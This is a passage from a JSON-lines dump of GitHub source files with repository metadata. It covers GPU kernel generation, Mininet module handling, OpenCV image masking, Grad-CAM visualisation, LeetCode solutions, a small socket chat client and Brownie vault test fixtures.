src1=vgpr(\"ValuC+%u\"%srcIdx,2)))\n # c.real = a.real * b.real - a.imag * b.imag = tmp1 - a.imag * b.imag\n cimod.add(VFmaF64(dst=vgpr(Holder(name=\"ValuC\"),2), src0=sgpr(\"Alpha+2\",2), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), src2=vgpr(vtmp1,2)))\n # c.imag = a.real * b.imag + a.imag * b.real = a.real * b.imag + tmp2\n cimod.add(VFmaF64(dst=vgpr(Holder(name=\"ValuC+2\"),2), src0=sgpr(\"Alpha+0\",2), src1=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), src2=vgpr(vtmp2,2)))\n imod.itemList[destIdx] = cimod\n return imod\n\n ##############################################################################\n # MoveMIoutToArch\n # function to handle MFMA MIout to Arch VGPR register\n ##############################################################################\ndef moveMIoutToArch(kernel, startVgprAlphaTmp):\n acc2arch, _ = accToArchMapper(kernel)\n\n imod = Module(\"MulAlpha\")\n imod.itemList = [None] * len(acc2arch)\n for i in range(len(acc2arch)):\n destIdx = acc2arch[i]\n srcIdx = i * kernel[\"MIRegPerOut\"]\n if kernel[\"ProblemType\"][\"ComputeDataType\"].isDouble():\n imod.itemList[destIdx] = VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC\"), 2),\n shiftHex=0,\n src=vgpr(\"ValuC+%u\"%srcIdx,2), comment=\"Rearrange MI out reg\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingle() or \\\n (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n elif (kernel[\"ProblemType\"][\"ComputeDataType\"].isHalf() and not kernel[\"ProblemType\"][\"HighPrecisionAccumulate\"]):\n imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isInt32():\n imod.itemList[destIdx] = VMovB32(dst=vgpr(Holder(name=\"ValuC\")),\n src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\")\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isSingleComplex():\n accImOffset = accVgprImagNumOffset(kernel, lrvwB)\n cimod = Module()\n cimod.add(VMovB32(dst=vgpr(Holder(name=\"ValuC\")), src=vgpr(\"ValuC+%u\"%srcIdx), comment=\"Rearrange MI out reg\"))\n cimod.addInst(VMovB32(dst=vgpr(Holder(name=\"ValuC+1\")), src=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset)), comment=\"Rearrange MI out reg\"))\n imod.itemList[destIdx] = cimod\n elif kernel[\"ProblemType\"][\"ComputeDataType\"].isDoubleComplex():\n accImOffset = accVgprImagNumOffset(kernel, lrvwB)\n cimod = Module()\n # tmp1 = a.real * b.real\n cimod.add(VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC\"), 2), shiftHex=0, src=vgpr(\"ValuC+%u\"%srcIdx,2), comment=\"Rearrange MI out reg\"))\n # tmp2 = a.imag * b.real\n cimod.add(VLShiftLeftB64(dst=vgpr(Holder(name=\"ValuC+2\"), 2), shiftHex=0, src=vgpr(\"ValuC+%u\"%(srcIdx+accImOffset),2), comment=\"Rearrange MI out reg\"))\n imod.itemList[destIdx] = cimod\n\n return imod\n\n","repo_name":"ROCmSoftwarePlatform/hipBLASLt","sub_path":"tensilelite/Tensile/KernelWriterModules.py","file_name":"KernelWriterModules.py","file_ext":"py","file_size_in_byte":16910,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"5577268854","text":"\"Module dependency utility functions for Mininet.\"\n\nfrom os import environ\nfrom sys import exit # pylint: disable=redefined-builtin\n\nfrom mininet.util import quietRun, BaseString\nfrom mininet.log import info, error, debug\n\n\ndef lsmod():\n \"Return output of lsmod.\"\n return quietRun( 'lsmod' )\n\ndef rmmod( mod ):\n \"\"\"Return output of lsmod.\n mod: module string\"\"\"\n return quietRun( [ 'rmmod', mod ] )\n\ndef modprobe( mod ):\n \"\"\"Return output of modprobe\n mod: module string\"\"\"\n return quietRun( [ 'modprobe', mod ] )\n\n\nOF_KMOD = 'ofdatapath'\nOVS_KMOD = 'openvswitch_mod' # Renamed 'openvswitch' in OVS 1.7+/Linux 3.5+\nTUN = 'tun'\n\ndef moduleDeps( subtract=None, add=None ):\n \"\"\"Handle module dependencies.\n subtract: string or list of module names to remove, if already loaded\n add: string or list of module names to add, if not already loaded\"\"\"\n subtract = subtract if subtract is not None else []\n add = add if add is not None else []\n if isinstance( subtract, BaseString ):\n subtract = [ subtract ]\n if isinstance( add, BaseString ):\n add = [ add ]\n for mod in subtract:\n if mod in lsmod():\n info( '*** Removing ' + mod + '\\n' )\n rmmodOutput = rmmod( mod )\n if rmmodOutput:\n error( 'Error removing ' + mod + ': \"%s\">\\n' % rmmodOutput )\n exit( 1 )\n if mod in lsmod():\n error( 'Failed to remove ' + mod + '; still there!\\n' )\n exit( 1 )\n for mod in add:\n if mod not in lsmod():\n info( '*** Loading ' + mod + '\\n' )\n modprobeOutput = modprobe( mod )\n if modprobeOutput:\n error( 'Error inserting ' + mod +\n ' - is it installed and available via modprobe?\\n' +\n 'Error was: \"%s\"\\n' % modprobeOutput )\n if mod not in lsmod():\n error( 'Failed to insert ' + mod + ' - quitting.\\n' )\n exit( 1 )\n else:\n debug( '*** ' + mod + ' already loaded\\n' )\n\n\ndef pathCheck( *args, **kwargs ):\n \"Make sure each program in *args can be found in $PATH.\"\n moduleName = kwargs.get( 'moduleName', 'it' )\n for arg in args:\n if not quietRun( 'which ' + arg ):\n error( 'Cannot find required executable %s.\\n' % arg +\n 'Please make sure that %s is installed ' % moduleName +\n 'and available in your $PATH:\\n(%s)\\n' % environ[ 'PATH' ] )\n exit( 1 )\n","repo_name":"mininet/mininet","sub_path":"mininet/moduledeps.py","file_name":"moduledeps.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":4978,"dataset":"github-code","pt":"21"} +{"seq_id":"34957198598","text":"import cv2\n\nimg1 = cv2.imread('resize_model1.jpg')\nimg2 = cv2.imread('opencv-logo-white.png')\n\n# I want to put logo on top-left corner, So I create a ROI\nrows, cols, channels = img2.shape\nprint(rows, cols, channels) # 222 180 3\n\nroi = img1[0:rows, 0:cols]\n\n# Now create a mask of logo and create its inverse mask also\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\nret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)\nmask_inv = cv2.bitwise_not(mask)\n\n# Now black-out the area of logo in ROI\nimg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\n\n# Take only region of logo from logo image.\nimg2_fg = cv2.bitwise_and(img2, img2, mask=mask)\n\n# Put logo in ROI and modify the main image\ndst = cv2.add(img1_bg, img2_fg)\nimg1[0:rows, 0:cols] = dst\n\ncv2.imshow('bg', img1_bg)\ncv2.imshow('fg', img2_fg)\n\ncv2.imshow('res', img1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"jacegem/OpenCV-Python-Tutorials","sub_path":"08. 이미지의 산술 연산/03 비트 연산.py","file_name":"03 비트 연산.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38507390837","text":"# given two integers dividend and divisor divide 2 ints\n# without using division multiplication and mod operator\n#return the quotient / answer and truncate toward zero\n#ie truncate(8.345)=8\n#2^31 - 1 when division result overdlows\n\n#this works leetcode just exceeds recursion limit\n\nimport timeit\nstart=timeit.default_timer()\n\nclass Solution:\n def divide(self,dividend: int, divisor: int) -> int:\n output=0\n dividendbool=False\n divisorbool=False\n if dividend <=0:\n dividendbool=True\n dividend *=-1\n if divisor <=0:\n divisorbool=True\n divisor *= -1\n result=dividend-divisor\n if result>=0:\n output+=1\n output+=Solution.divide(self,result,divisor)\n if -2147483649 >= output >= 2147483647: # test that it falls in appropriate region\n return 2147483647\n\n if (dividendbool==False and divisorbool==False) or (dividendbool==True and divisorbool==True):\n return output\n else:\n return output*-1\n\n\ns=Solution()\nx=Solution.divide(s,88,4)\nprint(x)\n\n\n","repo_name":"conordrayton/Leetcode","sub_path":"divide.py","file_name":"divide.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18322822413","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom app.kernel.kernel import Kernel\n\n\nclass LogisticKernel(Kernel):\n\n def __init__(self, kernel_id):\n super().__init__(kernel_id)\n self.reg: LogisticRegression or None = None\n self.le = LabelEncoder()\n\n def fit(self):\n reg = LogisticRegression()\n\n data = self.data\n labels, features = zip(*[(it['label'], it['features']) for it in data['data']])\n labels = np.array(labels)\n encoded_labels = self.le.fit_transform(np.array(labels).reshape(len(labels), 1))\n\n reg.fit(pd.DataFrame(features).values, encoded_labels)\n self.reg = reg\n\n def predict_one(self, features):\n encoded_result = self.reg.predict([list(features.values())])[0]\n return self.le.inverse_transform([encoded_result])[0]\n","repo_name":"donautech/behaiv-remote-kernel","sub_path":"app/kernel/logistic/LogisticRegressionKernel.py","file_name":"LogisticRegressionKernel.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15324389615","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Model\nimport gc\n\ntf.compat.v1.disable_eager_execution()\n\ndef normalize(x):\n \"\"\"Utility function to normalize a tensor by its L2 norm\"\"\"\n return (x + 1e-10) / (K.sqrt(K.mean(K.square(x))) + 1e-10)\n\ndef GradCam(model, img_array, layer_name):\n cls = np.argmax(model.predict(img_array))\n \n \"\"\"GradCAM method for visualizing input saliency.\"\"\"\n y_c = model.output[0, cls]\n conv_output = model.get_layer(layer_name).output\n grads = tf.gradients(y_c, conv_output)[0]\n # grads = normalize(grads)\n\n gradient_function = K.function([model.input], [conv_output, grads])\n output, grads_val = gradient_function([img_array])\n output, grads_val = output[0, :], grads_val[0, :, :, :]\n weights = np.mean(grads_val, axis=(0, 1))\n\n cam = np.dot(output, weights)\n cam = np.maximum(cam, 0) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0 \n\n return cam\n\ndef GradCamPlusPlus(model, img_array, layer_name):\n cls = np.argmax(model.predict(img_array))\n y_c = model.output[0, cls]\n conv_output = model.get_layer(layer_name).output\n grads = tf.gradients(y_c, conv_output)[0]\n # grads = normalize(grads)\n\n first = K.exp(y_c)*grads\n second = K.exp(y_c)*grads*grads\n third = K.exp(y_c)*grads*grads*grads\n\n gradient_function = K.function([model.input], [y_c,first,second,third, conv_output, grads])\n y_c, conv_first_grad, conv_second_grad,conv_third_grad, conv_output, grads_val = gradient_function([img_array])\n global_sum = np.sum(conv_output[0].reshape((-1,conv_first_grad[0].shape[2])), axis=0)\n\n alpha_num = conv_second_grad[0]\n alpha_denom = conv_second_grad[0]*2.0 + conv_third_grad[0]*global_sum.reshape((1,1,conv_first_grad[0].shape[2]))\n alpha_denom = np.where(alpha_denom != 0.0, alpha_denom, np.ones(alpha_denom.shape))\n alphas = alpha_num/alpha_denom\n\n weights = np.maximum(conv_first_grad[0], 0.0)\n alpha_normalization_constant = np.sum(np.sum(alphas, axis=0),axis=0)\n alphas /= alpha_normalization_constant.reshape((1,1,conv_first_grad[0].shape[2]))\n deep_linearization_weights = np.sum((weights*alphas).reshape((-1,conv_first_grad[0].shape[2])),axis=0)\n\n cam = np.sum(deep_linearization_weights*conv_output[0], axis=2)\n cam = np.maximum(cam, 0) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0 \n\n return cam\n\ndef softmax(x):\n f = np.exp(x)/np.sum(np.exp(x), axis = 1, keepdims = True)\n return f\n\ndef ScoreCam(model, img_array, layer_name, max_N=-1):\n\n cls = np.argmax(model.predict(img_array))\n act_map_array = Model(inputs=model.input, outputs=model.get_layer(layer_name).output).predict(img_array)\n \n # extract effective maps\n if max_N != -1:\n act_map_std_list = [np.std(act_map_array[0,:,:,k]) for k in range(act_map_array.shape[3])]\n unsorted_max_indices = np.argpartition(-np.array(act_map_std_list), max_N)[:max_N]\n max_N_indices = unsorted_max_indices[np.argsort(-np.array(act_map_std_list)[unsorted_max_indices])]\n act_map_array = act_map_array[:,:,:,max_N_indices]\n\n input_shape = model.layers[0].output_shape[0][1:] # get input shape\n # 1. upsampled to original input size\n act_map_resized_list = [cv2.resize(act_map_array[0,:,:,k], input_shape[:2], interpolation=cv2.INTER_LINEAR) for k in range(act_map_array.shape[3])]\n # 2. normalize the raw activation value in each activation map into [0, 1]\n act_map_normalized_list = []\n for act_map_resized in act_map_resized_list:\n if np.max(act_map_resized) - np.min(act_map_resized) != 0:\n act_map_normalized = act_map_resized / (np.max(act_map_resized) - np.min(act_map_resized))\n else:\n act_map_normalized = act_map_resized\n act_map_normalized_list.append(act_map_normalized)\n # 3. project highlighted area in the activation map to original input space by multiplying the normalized activation map\n masked_input_list = []\n for act_map_normalized in act_map_normalized_list:\n masked_input = np.copy(img_array)\n for k in range(3):\n masked_input[0,:,:,k] *= act_map_normalized\n masked_input_list.append(masked_input)\n masked_input_array = np.concatenate(masked_input_list, axis=0)\n # 4. feed masked inputs into CNN model and softmax\n pred_from_masked_input_array = softmax(model.predict(masked_input_array))\n # 5. define weight as the score of target class\n weights = pred_from_masked_input_array[:,cls]\n # 6. get final class discriminative localization map as linear weighted combination of all activation maps\n cam = np.dot(act_map_array[0,:,:,:], weights)\n cam = np.maximum(0, cam) # Passing through ReLU\n cam /= np.max(cam) # scale 0 to 1.0\n \n return cam\n\ndef superimpose(original_img_path, cam, emphasize=False):\n \n img_bgr = cv2.imread(original_img_path)\n\n heatmap = cv2.resize(cam, (img_bgr.shape[1], img_bgr.shape[0]))\n if emphasize:\n heatmap = sigmoid(heatmap, 50, 0.5, 1)\n heatmap = np.uint8(255 * heatmap)\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\n \n hif = .8\n superimposed_img = heatmap * hif + img_bgr\n superimposed_img = np.minimum(superimposed_img, 255.0).astype(np.uint8) # scale 0 to 255 \n superimposed_img_rgb = cv2.cvtColor(superimposed_img, cv2.COLOR_BGR2RGB)\n \n return superimposed_img_rgb\n\nimport tensorflow.keras\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\n\ndef build_guided_model(build_model_function):\n \"\"\"Function returning modified model.\n \n Changes gradient function for all ReLu activations according to Guided Backpropagation.\n \"\"\"\n if \"GuidedBackProp\" not in ops._gradient_registry._registry:\n @ops.RegisterGradient(\"GuidedBackProp\")\n def _GuidedBackProp(op, grad):\n dtype = op.inputs[0].dtype\n return grad * tf.cast(grad > 0., dtype) * \\\n tf.cast(op.inputs[0] > 0., dtype)\n\n g = tf.compat.v1.get_default_graph()\n with g.gradient_override_map({'Relu': 'GuidedBackProp'}):\n new_model = build_model_function()\n return new_model\n\ndef GuidedBackPropagation(model, img_array, layer_name):\n model_input = model.input\n layer_output = model.get_layer(layer_name).output\n max_output = K.max(layer_output, axis=3)\n grads = tf.gradients(max_output, model_input)[0]\n get_output = K.function([model_input], [grads])\n saliency = get_output([img_array])\n saliency = np.clip(saliency[0][0], 0.0, 1.0) # scale 0 to 1.0 \n return saliency\n\ndef sigmoid(x, a, b, c):\n return c / (1 + np.exp(-a * (x-b)))\n\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\ndef read_and_preprocess_img(path, size=(224,224)):\n img = load_img(path, target_size=size)\n x = img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n return x","repo_name":"tabayashi0117/Score-CAM","sub_path":"gradcamutils.py","file_name":"gradcamutils.py","file_ext":"py","file_size_in_byte":7093,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"36652595393","text":"# You are given the heads of two sorted linked lists list1 and list2.\n# Merge the two lists in a one sorted list. The list should be made by splicing together the nodes of the first two lists.\n# Return the head of the merged linked list.\n\n# Ex 1:\n# Input: list1 = [1,2,4], list2 = [1,3,4]\n# Output: [1,1,2,3,4,4]\n# Example 2:\n\n# Input: list1 = [], list2 = []\n# Output: []\n# Example 3:\n\n# Input: list1 = [], list2 = [0]\n# Output: [0]\n\n# Constraints:\n\n# The number of nodes in both lists is in the range [0, 50].\n# -100 <= Node.val <= 100\n# Both list1 and list2 are sorted in non-decreasing order.\n\n# Solution 1 : Iterative Approach\n# First you initialize dummy and temp. One is sitting at the start of the linkedlist and the other (temp) is going to move forward\n# find which value should be added to the list. Note that it's initialized with a value 0 but it can be anything! You initialize \n# it with your value of choice! Doesn't matter since we're going to finally return dummy.next which disregards 0 that we used to \n# start the linkedlist. Line #1 makes sure none of the l1 and l2 are empty! If one of them is empty, \n# we should return the other! If both are nonempty, we check val of each of them to add the smaller one to the result linkedlist! \n# In line #2, l1.val is smaller and we want to add it to the list. How? We use temp POINTER (it's pointer, remember that!). \n# Since we initialized temp to have value 0 at first node, we use temp.next to point 0 to the next value we're going to add to \n# the list l1.val (line #3). Once we do that, we update l1 to go to the next node of l1. If the if statement of line #2 doesn't work, we do similar stuff with l2. And finally, if the length of l1 and l2 are not the same, we're going to the end of one of them at some point! Line #5 adds whatever left from whatever linkedlist to the temp.next (check the above video for a great explanation of this part). Note that both linkedlists were sorted initially. Also, this line takes care of when one of the linkedlists are empty. Finally, we return dummy.next since dummy is pointing to 0 and next to zero is what we've added throughout the process.\n\n# Time: O(m+n) which is the lenght of 2 ll's, Space : O(1)\n\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode: \n dummy = temp = ListNode(0)\n while l1 and l2: #1\n\n if l1.val < l2.val: #2\n temp.next = l1 #3\n l1 = l1.next #4\n else: \n temp.next = l2\n l2 = l2.next\n temp = temp.next # IMP : Move on to the next element\n temp.next = l1 or l2 #5\n return dummy.next #6\n\n# Solution 2 : Recursive Approach\n# Another way of solving is problem is by doing recursion. The first check is obvious! If one of them is empty, return the other one! Similar to line \n#5 of previous solution. Here, we have two cases, whatever list has the smaller first element (equal elements also satisfies line #1), will be returned at the end. \n# In the example l1 = [1,2,4], l2 = [1,3,4], we go in the if statement of line #1 first, this means that the first element of l1 doesn't get changed! Then, we move the pointer to the second element of l1 by calling the function again but with l1.next and l2 as input! This round of call, goes to line #2 because now we have element 1 from l2 versus 2 from l1. Now, basically, l2 gets connected to the tail of l1. \n# We keep moving forward by switching between l1 and l2 until the last element. \n\nclass Solution:\n def mergeTwoLists(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n if not l1 or not l2:\n return l1 or l2\n if l1.val <= l2.val: #1\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else: #2\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2 ","repo_name":"nischal-hp/Coding-Problems","sub_path":"Linked List/MergeTwoSortedLists.py","file_name":"MergeTwoSortedLists.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27574770755","text":"import socket\n\n\n\nserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost=\"105.165.63.122\"\nport=7636\n\nserver.connect((host,port))\nprint(\"waiting for messages..\")\n\nwhile True:\n server_messg=server.recv(1024)\n\n print(\"received:\",server_messg.decode())\n\n client_messg=input(\"sent:\")\n server.send(client_messg.encode())\n","repo_name":"Rogendo/Sending-text-messages","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29384468341","text":"from rest_framework import serializers\r\n\r\nfrom .models import Customer, Address, Order, OrderItems\r\n\r\nclass CustomerSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Customer\r\n fields = \"__all__\"\r\n\r\n def create(self, validated_data):\r\n return Customer.objects.create(**validated_data)\r\n\r\n def update(self, instance, validated_data):\r\n instance.first_name = validated_data.get('first_name', instance.first_name)\r\n instance.last_name = validated_data.get('last_name', instance.last_name)\r\n instance.prime_customer = validated_data.get('prime_customer', instance.preferred_customer)\r\n instance.customer_since = validated_data.get('customer_since', instance.customer_since)\r\n\r\n instance.save()\r\n return instance\r\n\r\nclass AddressSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Address\r\n fields = \"__all__\"\r\n\r\n def create(self, validated_data):\r\n return Address.objects.create(**validated_data)\r\n\r\n def update(self, instance, validated_data):\r\n instance.street = validated_data.get('street', instance.street)\r\n instance.city = validated_data.get('city', instance.city)\r\n instance.state = validated_data.get('state', instance.state)\r\n instance.zip_code = validated_data.get('zip_code', instance.zip_code)\r\n\r\n instance.save()\r\n return instance\r\n\r\nclass OrderSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Order\r\n fields = \"__all__\"\r\n\r\n def create(self, validated_data):\r\n return Order.objects.create(**validated_data)\r\n\r\n def update(self, instance, validated_data):\r\n instance.order_number = validated_data.get('order_number', instance.order_number)\r\n instance.item_description = validated_data.get('item_description', instance.item_description)\r\n instance.item_quantity = validated_data.get('item_quantity', instance.item_quantity)\r\n instance.payment_type = validated_data.get('payment_type', instance.payment_type)\r\n instance.account_number = validated_data.get('account_number', instance.account_number)\r\n\r\n instance.save()\r\n return instance\r\n\r\nclass OrderItemsSerializer(serializers.ModelSerializer):\r\n print('test1')\r\n class Meta:\r\n print('test2')\r\n model = OrderItems\r\n fields = \"__all__\"\r\n\r\n def create(self, validated_data):\r\n print('test3')\r\n return OrderItems.objects.create(**validated_data)\r\n\r\n def update(self, instance, validated_data):\r\n print('test4')\r\n instance.item_description = validated_data.get('item_description', instance.item_description)\r\n instance.item_quantity = validated_data.get('item_quantity', instance.item_quantity)\r\n\r\n instance.save()\r\n return instance\r\n","repo_name":"mattcodesz/DjangoProject","sub_path":"FinalProject/FinalApp/Serializers.py","file_name":"Serializers.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43936060830","text":"from mellinger_trj_nlopt import Mellinger\nimport rospy\nfrom polynomialTrjNonlinear.vertex import Vertex\n\n\nclass CentrolizedController(object):\n def __init__(self):\n dimension = 3\n self.quads = [\n Mellinger('hummingbird_0', 0.95, 0.0, 0.35),\n Mellinger('hummingbird_1', 0.0, 0.95, 0.35),\n Mellinger('hummingbird_2', -0.95, 0.0, 0.35),\n Mellinger('hummingbird_3', 0.0, -0.95, 0.35)\n ]\n self.num_of_quads = 4\n\n vertices = []\n vertex0 = Vertex(dimension=dimension, index=0)\n start_position = [0.0, 0.0, 0.0]\n start_velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex0, order=0, input_list=start_position)\n nl_opt.planner.construct_constrain(vertex0, order=1, input_list=start_velocity)\n\n vertex0.makeStartOrEnd(position=start_position, up_to_order=4)\n\n vertex1 = Vertex(dimension=dimension, index=1)\n\n position = [2.0, 0.0, 2.0]\n velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex1, order=0, input_list=position)\n nl_opt.planner.construct_constrain(vertex1, order=1, input_list=velocity)\n\n vertex2 = Vertex(dimension=dimension, index=2)\n position = [4.0, 0.0, 4.0]\n velocity = [0.0, 0.0, 0.0]\n for nl_opt in self.quads:\n nl_opt.planner.construct_constrain(vertex2, order=0, input_list=position)\n nl_opt.planner.construct_constrain(vertex2, order=1, input_list=velocity)\n\n vertex2.makeStartOrEnd(position=position, up_to_order=4)\n\n vertices.append(vertex0)\n vertices.append(vertex1)\n vertices.append(vertex2)\n\n times = [3.89891, 3.91507]\n\n for nl_opt in self.quads:\n nl_opt.planner.setupFromVertices(vertices, times)\n nl_opt.planner.add_max_vel(2.0)\n nl_opt.planner.add_max_acc(1.0)\n\n\nif __name__ == '__main__':\n central_controller = CentrolizedController()\n for i_controller in central_controller.quads:\n i_controller.optimize()\n i_controller.get_planned_pos_vel()\n i_controller.load_trj_lists()\n rospy.init_node(\"controller\", anonymous=True)\n rate = rospy.Rate(50)\n rospy.sleep(3.0)\n # for i in range(central_controller.num_of_quads):\n # central_controller.quads[i].planner.set_segment_time(segment_times=[3.0, 3.0])\n # central_controller.quads[i].solve_poly3d()\n # central_controller.quads[i].planner.add_offset()\n # central_controller.quads[i].load_trj_lists()\n\n while not rospy.is_shutdown():\n for i_controller in central_controller.quads:\n # i_controller.set_hover_des(1.5)\n # i_controller.hover_and_trj_xy(dimension='x')\n i_controller.publish_poly3d_trj()\n i_controller.publish_err()\n i_controller.update_current_state()\n i_controller.update_desired_values()\n i_controller.motorSpeedFromU()\n # i_controller.multiply_motor_speed(1.2)\n i_controller.send_motor_command()\n rate.sleep()\n\n","repo_name":"intelligent-control-lab/Collaborative_Aerial_Transportation","sub_path":"rotors_gazebo/scripts/collaborative/control_node_collaborative.py","file_name":"control_node_collaborative.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"9273501105","text":"import time\n\nfrom brownie import (\n DemoStrategy,\n Vault,\n MockToken,\n AdminUpgradeabilityProxy,\n TestVipCappedGuestListBbtcUpgradeable,\n accounts,\n)\n\nfrom helpers.constants import AddressZero\nfrom rich.console import Console\n\nconsole = Console()\n\nfrom dotmap import DotMap\nimport pytest\n\nperformanceFeeGovernance = 1000\nperformanceFeeStrategist = 1000\nwithdrawalFee = 50\nmanagementFee = 50\n\n################# Token #################\n\n\n@pytest.fixture\ndef token(badger, deployer):\n token = MockToken.deploy({\"from\": deployer})\n token.initialize([badger.address], [1000 * 10 ** 18])\n return token\n\n\n#########################################\n\n################# Actors #################\n\n# Initializer and giver of tokens\n@pytest.fixture\ndef badger():\n yield accounts[0]\n\n\n@pytest.fixture\ndef deployer():\n yield accounts[1]\n\n\n@pytest.fixture\ndef governance():\n yield accounts[2]\n\n\n@pytest.fixture\ndef keeper():\n yield accounts[3]\n\n\n@pytest.fixture\ndef guardian():\n yield accounts[4]\n\n\n@pytest.fixture\ndef proxyAdmin():\n yield accounts[5]\n\n\n@pytest.fixture\ndef strategist():\n yield accounts[6]\n\n\n@pytest.fixture\ndef rando():\n yield accounts[9]\n\n\n###########################################\n\n################# Deploy #################\n@pytest.fixture\ndef deployed_vault(deployer, governance, keeper, guardian, strategist, token):\n vault = Vault.deploy({\"from\": deployer})\n vault.initialize(\n token,\n governance,\n keeper,\n guardian,\n governance,\n strategist,\n False,\n \"\",\n \"\",\n [\n performanceFeeGovernance,\n performanceFeeStrategist,\n withdrawalFee,\n managementFee,\n ],\n )\n return vault\n\n\n@pytest.fixture\ndef deploy_complete(\n deployer, governance, keeper, guardian, badger, rando, proxyAdmin, strategist\n):\n\n token = MockToken.deploy({\"from\": deployer})\n token.initialize(\n [deployer.address, rando.address], [100 * 10 ** 18, 100 * 10 ** 18]\n )\n want = token\n\n # NOTE: change strategist\n vault = Vault.deploy({\"from\": deployer})\n vault.initialize(\n token,\n governance,\n keeper,\n guardian,\n governance,\n strategist,\n False,\n \"\",\n \"\",\n [\n performanceFeeGovernance,\n performanceFeeStrategist,\n withdrawalFee,\n managementFee,\n ],\n )\n vault.setStrategist(strategist, {\"from\": governance})\n # NOTE: Vault starts unpaused\n\n strategy = DemoStrategy.deploy({\"from\": deployer})\n strategy.initialize(vault, [token])\n # NOTE: Strategy starts unpaused\n\n vault.setStrategy(strategy, {\"from\": governance})\n\n return DotMap(\n vault=vault,\n strategy=strategy,\n want=want,\n performanceFeeGovernance=performanceFeeGovernance,\n performanceFeeStrategist=performanceFeeStrategist,\n withdrawalFee=withdrawalFee,\n )\n\n\n@pytest.fixture\ndef deployed_gueslist(\n deployed_vault,\n deployer,\n governance,\n proxyAdmin,\n keeper,\n guardian,\n strategist,\n token,\n):\n \"\"\"\n Deploys TestVipCappedGuestListBbtcUpgradeable.sol for testing Guest List functionality\n \"\"\"\n\n # NOTE: Change accordingly\n vaultAddr = deployed_vault.address\n merkleRoot = \"0x1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a\"\n userCap = 2e18\n totalCap = 50e18\n\n # Get deployer account from local keystore. Deployer must be the\n # vault's governance address in order to set its guestlist parameters.\n dev = deployer\n\n # Get actors\n governance = governance\n proxyAdmin = proxyAdmin\n\n assert governance != AddressZero\n assert proxyAdmin != AddressZero\n\n # Deploy guestlist\n guestlist = deploy_guestlist(dev, proxyAdmin, vaultAddr)\n\n # Set guestlist parameters\n guestlist.setUserDepositCap(userCap, {\"from\": dev})\n assert guestlist.userDepositCap() == userCap\n\n guestlist.setTotalDepositCap(totalCap, {\"from\": dev})\n assert guestlist.totalDepositCap() == totalCap\n\n # Transfers ownership of guestlist to Badger Governance\n guestlist.transferOwnership(governance, {\"from\": dev})\n assert guestlist.owner() == governance\n\n vault = deployed_vault\n\n vault.setStrategist(deployer, {\"from\": 